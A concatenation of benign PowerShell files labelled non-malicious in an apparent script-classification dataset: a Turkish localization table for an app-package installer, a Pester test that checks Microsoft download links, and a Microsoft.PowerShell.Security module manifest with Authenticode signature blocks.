cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAg9 # v6slj3SS+d8jGPxuc5b+X2ECwiN5YtcGROb+0J/NMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAeZ1412M1Q5h4+mOZcZ+Y3Fe1DB4i3WvyKanl # CT2Nf8XIkMN7ggGeUqkUFqXNjw4E7cfx/+0cxc/kIBxAfEFxBr5h1Qibx9O3o9tB # AlrCrIiICyL1LFiHw164ac3HJLMtlM4VwePsyHE/XdmjopQeHuJlJ8a6iz5L5F08 # y4VKUCjRISeTfqYlkdhhlIY10zUcrVzP4rdxp1vSayHT3RXGA+mOXh8GPcSrNiD9 # okGzgDqqf07mQUIuBDKk2fFyygV/g1mRDUsZhUPMdh/zDhSM6TiKEe8wIiECq6lF # 6X3+OHPJzIaDp2dzsggitGV/5J3tRY2YN4zIXyN9KZ1jHvASnaGCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCAYBscfvLsIMLDwbxDBGrD2K5/61BG/bw3w # 1xOOvwYoWAIGZiAsyX28GBMyMDI0MDQyMzE0MTExNy44MDVaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCM # wl9YXo4AAQAAAdwwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjpEMDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvI # syA1sjg9kSKJzelrUWF5ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0Ra # GrU8EHydF8NxPMR2KVNiAtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYn # iwKLPQLJ00EkXw5TSwfmJXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdF # LKwo4BTlEgnvzeTfXukzX8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8Xl # BQDVDX5JeMEsx7jgJDdEnK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7 # rSFvcLnwAqMdqcy/iqQPMlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg # 8oWwXyiv3+bGB6dmdM61ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/Db # USqW2RqTUa2O2KuvsyRGMEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+f # dTw+geRn6Mo2S6+/bZEwS/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGV # PRqkmz5UYz+R5ybMJWj+mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0ph # jUTH2GChHIvE4SDSk2hwWP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQU6HPSBd0OfEX3uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBANnrb8Ewr8eX/H1sKt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g # 6Tf7tNx1q0NpKk1JTupUJfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXT # MzxiewfErVLt8WefebncST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz # /zEA1AbZL/viXtHmryA0CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+d # h+UsFi0d4lkdcE+Zq5JNjIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YW # zhP/5XQnYl03AfXErn+1Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1 # qy4y4vlVKaShtbdfgPyGeeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3h # sHzG8n5u5CQajPwx9PzpsZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4Q # wGf5B71x57OjaX53gxT4vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ06 # 2nyIZKnsXxzuKFb0TjXWw6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0 # bSrAlVeihcaG5F74SZT8FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjpEMDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJf # SbL3djnQEqaggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOnRQkowIhgPMjAyNDA0MjMwNDA4NDJaGA8yMDI0MDQy # NDA0MDg0MlowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6dFCSgIBADAHAgEAAgIU # TDAHAgEAAgISBDAKAgUA6dKTygIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # AKdfQ6krn/9XKU8Iy031XFlG85OEXSoh4dBGaqeGlD943dkMdlPnjE+MNokMWYaQ # 0JNKwtpMkAnPoDcyylCPCELlR54i9KaOR7WJp72VKtL04H/EbopdGU86A523FLhA # dtVx7+UUaWwr/s7KcbHaSrCmgPUrOzaTxyDnHHkwJ3OWMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAA # AdwwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQgj1elme4YKE9swI6N9KfC0Nv28UWHgJvBaeuj4Yu7 # FoYwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0 # Ou0IqxELDhX2TLylxIINNzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB3MHgjMJfWF6OAAEAAAHcMCIEIMlj5Czdui1+yXOeEgNyO7aq # td0QRMsB+0i74NsgRz7zMA0GCSqGSIb3DQEBCwUABIICAIu20v7QbahWfPJhPbNE # 5+vSuw3eDdM9U1wxfUUQ5OduclCxk/wp+VmbpmfuUw39Ktzgf/pbEsHxmfengHRt # g8GJJP7Mg6Mipki6goVtbC6WN1pO65RVot0mTiDss0ED9tGp9GbqAxHybdgwUhti # eVvN9BhKcAFVCgG+g+sCoJrCJnLfqSz1SbE/nnvqUkM4Nf2WDMne4GMtdtPre2BC # +UlMtZO7cY09/F7v9XfW5U+uHGtkZItSiwSoWpMKhcuY/wbXQle8WNZNT+wboIAI # Y45f3HSpzkLJoW9UPv0r/OiatBZc7/kQ2ZBP29PS3ewT2kHAHu/CFJ1O5Njxdnkd # m99Hmm9txFVadJxnU8uygfE7caA+JkY63muL9tH5OQ6faiqmQmPqxrzNXa/btQO/ # yj43KlwF21R6loLKxoB1yCoN/VBMX/PoRWUIYRwxPBWZAqiEZDFe21NTNCyipy0F # MCwWOYrs96LdixCn5qo3/99ghv7yXzcTUXIlMjU+h3QPUMbj2tmVl+uvmQ6ve+S8 # /Xd1OKvBvkmqe4rbL7L8YrED6cTFAJRju9feX6CUZk3J020/ZRTuRbjlV//4SC5i # MjNzBdKqo+ZVwKuvlEo8iWDZO7G/WIpKnPw1H9vU4j2mDZA8gPHaOKzttFNBDKv4 # ivXlmtL1GXlB5CpnXUh9BjPm # SIG # End signature block
combined_dataset/train/non-malicious/sample_5_76.ps1
sample_5_76.ps1
# Localized 10/16/2024 05:34 PM (GMT) 303:7.1.41104 Add-AppDevPackage.psd1 # Culture = "en-US" ConvertFrom-StringData @' ###PSLOC PromptYesString=&Evet PromptNoString=&Hayır BundleFound=Demet bulundu: {0} PackageFound=Paket bulundu: {0} EncryptedBundleFound=Şifreli demet bulundu: {0} EncryptedPackageFound=Şifreli paket bulundu: {0} CertificateFound=Sertifika bulundu: {0} DependenciesFound=Bağımlılık paketleri bulundu: GettingDeveloperLicense=Geliştirici lisansı alınıyor... InstallingCertificate=Sertifika yükleniyor... InstallingPackage=\nUygulama yükleniyor... AcquireLicenseSuccessful=Geliştirici lisansı başarıyla alındı. InstallCertificateSuccessful=Sertifika başarıyla yüklendi. Success=\nBaşarılı: Uygulamanız başarıyla yüklendi. WarningInstallCert=\nBilgisayarınızın Güvenilen Kişiler sertifika deposuna dijital bir sertifika yüklemek üzeresiniz. Bu işlem ciddi güvenlik riskleri taşır ve yalnızca bu dijital sertifikayı oluşturan kişiye güveniyorsanız yapılmalıdır.\n\nBu uygulamayı kullanmayı bıraktığınızda ilgili dijital sertifikayı el ile kaldırmanız gerekir. Bu işleme yönelik yönergeleri şurada bulabilirsiniz: http://go.microsoft.com/fwlink/?LinkId=243053\n\nDevam etmek istediğinizden emin misiniz?\n\n ElevateActions=\nBu uygulamayı yüklemeden önce şunları yapmanız gerekir: ElevateActionDevLicense=\t- Geliştirici liasnsı alın ElevateActionCertificate=\t- İmza sertifikasını yükleyin ElevateActionsContinue=Devam etmek için yönetici kimlik bilgileri gereklidir. Lütfen UAC istemini kabul edin ve istenirse yönetici parolanızı girin. ErrorForceElevate=Devam etmek için yönetici kimlik bilgilerini sağlamalısınız. Lütfen bu betiği -Force parametresi olmadan veya yükseltilmiş bir PowerShell penceresinden çalıştırın. ErrorForceDeveloperLicense=Geliştirici lisansı almak için kullanıcı etkileşimi gereklidir. Lütfen betiği -Force parametresi olmadan yeniden çalıştırın. ErrorLaunchAdminFailed=Hata: Yönetici olarak yeni bir işlem başlatılamadı. ErrorNoScriptPath=Hata: Bu betiği bir dosyadan başlatmalısınız. ErrorNoPackageFound=Hata: Betik dizininde paket veya demet bulunamadı. Lütfen yüklemek istediğiniz paketin veya demetin bu betik ile aynı dizine yerleştirildiğinden emin olun. ErrorManyPackagesFound=Hata: Betik dizininde birden fazla paket veya demet bulundu. Lütfen yalnızca yüklemek istediğiniz paketin veya demetin bu betik ile aynı dizine yerleştirildiğinden emin olun. ErrorPackageUnsigned=Hata: Paket veya demet dijital olarak imzalanmamış veya imza bozuk. ErrorNoCertificateFound=Hata: Betik dizininde sertifika bulunamadı. Lütfen yüklediğiniz paketi veya demeti imzalamak için kullanılan sertifikanın bu betik ile aynı dizine yerleştirildiğinden emin olun. ErrorManyCertificatesFound=Hata: Betik dizininde birden fazla sertifika bulundu. Lütfen yalnızca yüklediğiniz paketi veya demeti imzalamak için kullanılan sertifikanın bu betik ile aynı dizine yerleştirildiğinden emin olun. ErrorBadCertificate=Hata: "{0}" dosyası geçerli bir dijital sertifika değil. CertUtil hata kodu {1} ile döndürüldü. ErrorExpiredCertificate=Hata: "{0}" geliştirici sertifikasının süresi doldu. Sistem saatinin doğru tarih ve saate ayarlanmamış olması buna neden olabilir. Sistem ayarları doğruysa, paketi veya demeti geçerli bir sertifika ile yeniden oluşturmak üzere uygulama sahibine başvurun. ErrorCertificateMismatch=Hata: Sertifika, paketi veya demeti imzalamak için kullanılan sertifika ile eşleşmiyor. ErrorCertIsCA=Hata: Sertifika bir sertifika yetkilisi olamaz. ErrorBannedKeyUsage=Hata: Sertifika şu anahtar kullanımına sahip olamaz: {0}. Anahtar kullanımı belirtilmemiş veya "DigitalSignature" öğesine eşit olmalıdır. ErrorBannedEKU=Hata: Sertifika şu genişletilmiş anahtar kullanımına sahip olamaz: {0}. Yalnızca Kod İmzalama ve Ömür Boyu İmzalama EKU'larına izin verilir. ErrorNoBasicConstraints=Hata: Sertifikada temel kısıtlamalar uzantısı eksik. ErrorNoCodeSigningEku=Hata: Sertifikada Kod İmzalama için genişletilmiş anahtar kullanımı eksik. ErrorInstallCertificateCancelled=Hata: Sertifika yüklemesi iptal edildi. ErrorCertUtilInstallFailed=Hata: Sertifika yüklenemedi. CertUtil hata kodu {0} ile döndürüldü. ErrorGetDeveloperLicenseFailed=Hata: Geliştirici lisansı alınamadı. Daha fazla bilgi için, bkz. http://go.microsoft.com/fwlink/?LinkID=252740. ErrorInstallCertificateFailed=Hata: Sertifika yüklenemedi. Durum: {0}. Daha fazla bilgi için, bkz. http://go.microsoft.com/fwlink/?LinkID=252740. ErrorAddPackageFailed=Hata: Uygulama yüklenemedi. ErrorAddPackageFailedWithCert=Hata: Uygulama yüklenemedi. Güvenliği sağlamak için, lütfen uygulamayı yükleyene kadar imza sertifikasını kaldırmayı deneyin. Bu işleme yönelik yönergeleri şurada bulabilirsiniz:\nhttp://go.microsoft.com/fwlink/?LinkId=243053 '@
combined_dataset/train/non-malicious/1764.ps1
1764.ps1
Describe "Windows Installer" -Tags "Scenario" { BeforeAll { $skipTest = -not $IsWindows $preRequisitesLink = 'https://aka.ms/pscore6-prereq' $linkCheckTestCases = @( @{ Name = "Universal C Runtime"; Url = $preRequisitesLink } @{ Name = "WMF 4.0"; Url = "https://www.microsoft.com/download/details.aspx?id=40855" } @{ Name = "WMF 5.0"; Url = "https://www.microsoft.com/download/details.aspx?id=50395" } @{ Name = "WMF 5.1"; Url = "https://www.microsoft.com/download/details.aspx?id=54616" } ) } It "WiX (Windows Installer XML) file contains pre-requisites link $preRequisitesLink" -skip:$skipTest { $wixProductFile = Join-Path -Path $PSScriptRoot -ChildPath "..\..\..\assets\Product.wxs" (Get-Content $wixProductFile -Raw).Contains($preRequisitesLink) | Should Be $true } It "Pre-Requisistes link for '<Name>' is reachable: <url>" -TestCases $linkCheckTestCases -skip:$skipTest { param ($Url) foreach ($i in 1..5) { try { $result = Invoke-WebRequest $Url -UseBasicParsing break; } catch { Start-Sleep -Seconds 1 } } $result | Should -Not -Be $null } }
combined_dataset/train/non-malicious/sample_45_34.ps1
sample_45_34.ps1
@{ GUID="A94C8C7E-9810-47C0-B8AF-65089C13A35A" Author="PowerShell" CompanyName="Microsoft Corporation" Copyright="Copyright (c) Microsoft Corporation." ModuleVersion="7.0.0.0" CompatiblePSEditions = @("Core") PowerShellVersion="3.0" FunctionsToExport = @() CmdletsToExport="Get-Acl", "Set-Acl", "Get-PfxCertificate", "Get-Credential", "Get-ExecutionPolicy", "Set-ExecutionPolicy", "Get-AuthenticodeSignature", "Set-AuthenticodeSignature", "ConvertFrom-SecureString", "ConvertTo-SecureString", "Get-CmsMessage", "Unprotect-CmsMessage", "Protect-CmsMessage" , "New-FileCatalog" , "Test-FileCatalog" AliasesToExport = @() NestedModules="Microsoft.PowerShell.Security.dll" HelpInfoURI = 'https://aka.ms/powershell72-help' } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD++xTkW7oivoiQ # gqU/R85f/MwSI1hVEeaegSriXP6+BqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # 